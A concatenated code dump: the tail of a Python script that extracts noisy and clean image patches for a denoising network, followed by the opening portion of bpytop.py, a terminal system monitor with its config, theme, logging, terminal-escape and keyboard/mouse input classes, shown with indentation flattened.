patches_n = sample_patches_2d(noisy_img, patch_shape, patches_per_image, offset_x, offset_y, random_state)
for j in range(patches_c.shape[0]):
name = "c" + str(count).zfill(7) + ".tiff"
Image.fromarray(patches_c[j]).save(Clean_out + name)
name = "n" + str(count).zfill(7) + ".tiff"
Image.fromarray(patches_n[j]).save(Noisy_out + name)
count += 1
random_state += 1
pbar.update(1)
pbar.close()
def get_file_list(dir):
"""Get List of files from directory
Input: DIR, directory to retrieve content from
Return: filename_list, list of contents filename, sorted by sorted()
"""
if not os.path.exists(dir):
raise IOError("%s does not exsit." % dir)
filename_list = []
for root, _ , files in os.walk(dir):
files = sorted(files)
for f in files:
filename_list.append(root + f)
return filename_list
def main(args):
Noisy_dir = args.Noisy_dir
Clean_dir = args.Clean_dir
Noisy_output = args.Noisy_output
Clean_output = args.Clean_output
ox = args.offset_x
oy = args.offset_y
if not os.path.exists(Noisy_output):
print ("Creating ", Noisy_output)
os.mkdir(Noisy_output)
if not os.path.exists(Clean_output):
print ("Creating ", Clean_output)
os.mkdir(Clean_output)
ppi = args.Patches_per_image
pw = args.Patch_width
Noisy_List = get_file_list(Noisy_dir)
Clean_List = get_file_list(Clean_dir)
extract_patches_multi(Noisy_List, Clean_List, Noisy_output, Clean_output, ppi, (pw, pw), ox, oy)
# extract_patches(Noisy_List, Clean_List, Noisy_output, Clean_output, ppi, (pw, pw), ox, oy)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = "Helper function to extract patches for deepdenoisenet")
parser.add_argument('Noisy_dir', type = str, help = "Directory for your noisy images")
parser.add_argument('Clean_dir', type = str, help = "Directory for your reference clean images")
parser.add_argument('--Noisy_output', '-no', type = str, help = "Directory to output noisy patches", default = "./Images/NoisyPatches/")
parser.add_argument('--Clean_output', '-co', type = str, help = "Directory to output clean patches", default = "./Images/CleanPatches/")
parser.add_argument('--Patches_per_image', '-ppi', type = int, help = "Patches to extract per image", default = 10)
parser.add_argument('--Patch_width', '-pw', type = int, help = "Width of patch, which is square", default = 128)
parser.add_argument('--offset_x', '-ox', type = int, help = "x offset to align mosaic", default = 0)
parser.add_argument('--offset_y', '-oy', type = int, help = "y offset to align mosaic", default = 0)
args = parser.parse_args()
main(args)
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print ("ERROR!")
for error in errors:
print(error)
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.33"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]")
args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes")
args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box")
args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_MODE: str = ""
if stdargs.full:
ARG_MODE = "full"
elif stdargs.proc:
ARG_MODE = "proc"
elif stdargs.stat:
ARG_MODE = "stat"
if stdargs.debug:
DEBUG = True
else:
DEBUG = False
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown.
view_mode=$view_mode
#* Update time in milliseconds, increases automatically if set below the internal loop's processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to False if the menus are flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to an exclude filter, otherwise defaults to an include filter. Example: disks_filter="exclude=boot, home"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Set fixed values for network graphs, default "10M" = 10 Mebibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e. "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetic
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
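#* Note (illustrative): the "$name" placeholders above are filled in with string.Template substitution,
#* i.e. DEFAULT_CONF.substitute(Config.conf_dict) is what Config.save_config() below writes to disk.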
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
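#* Usage sketch (illustrative only): time a function or a named section and log the result to errlog
# @timeit_decorator
# def collect_stats(): ...                   # elapsed time is logged with errlog.debug on return
# TimeIt.start("draw"); TimeIt.stop("draw")  # manual variant, TimeIt.pause("draw") can suspend the timer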
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background",
"net_sync", "show_battery", "tree_depth"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
update_ms: int = 2000
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
show_battery: bool = True
show_init: bool = True
view_mode: str = "full"
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
view_modes: List[str] = ["full", "proc", "stat"]
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
			self.info.append(f'Config file malformed or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
			self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
for key in self.keys:
if line.startswith(key):
line = line.replace(key + "=", "")
if line.startswith('"'):
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes:
new_config["view_mode"] = "_error_"
self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!')
		if "update_ms" in new_config and isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
if CONFIG.log_level == "DEBUG": DEBUG = True
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
if text: text = f' {text}'
return f'\033]0;{os.environ.get("TERMINAL_TITLE", "")}{text}\a'
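#* Usage sketch (illustrative): typical setup/teardown with the terminal escapes above
# Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
# Draw.now(Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.title())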
class Fx:
"""Text effects
	* trans(string: str): Replaces whitespace with a cursor-right escape so the background behind it is not overwritten.
	* uncolor(string: str): Removes all 24-bit color escape sequences and returns the string."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
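#* Usage sketch (illustrative): wrap text in effect escapes and strip 24-bit color codes again
# Draw.now(f'{Fx.b}bold{Fx.ub} {Fx.i}italic{Fx.ui} {Fx.u}underline{Fx.uu}')
# plain = Fx.uncolor(f'{Color.fg("#ff3050")}colored{Term.fg}')   # -> "colored"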
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
	restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
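#* Usage sketch (illustrative): movement escapes compose into plain strings for Draw
# Draw.now(Mv.to(5, 10), "at line 5 col 10", Mv.d(1), Mv.l(8), "one line below")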
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
if cls.list: return True
else: return False
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
						for code in cls.escape.keys(): #* Go through the dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
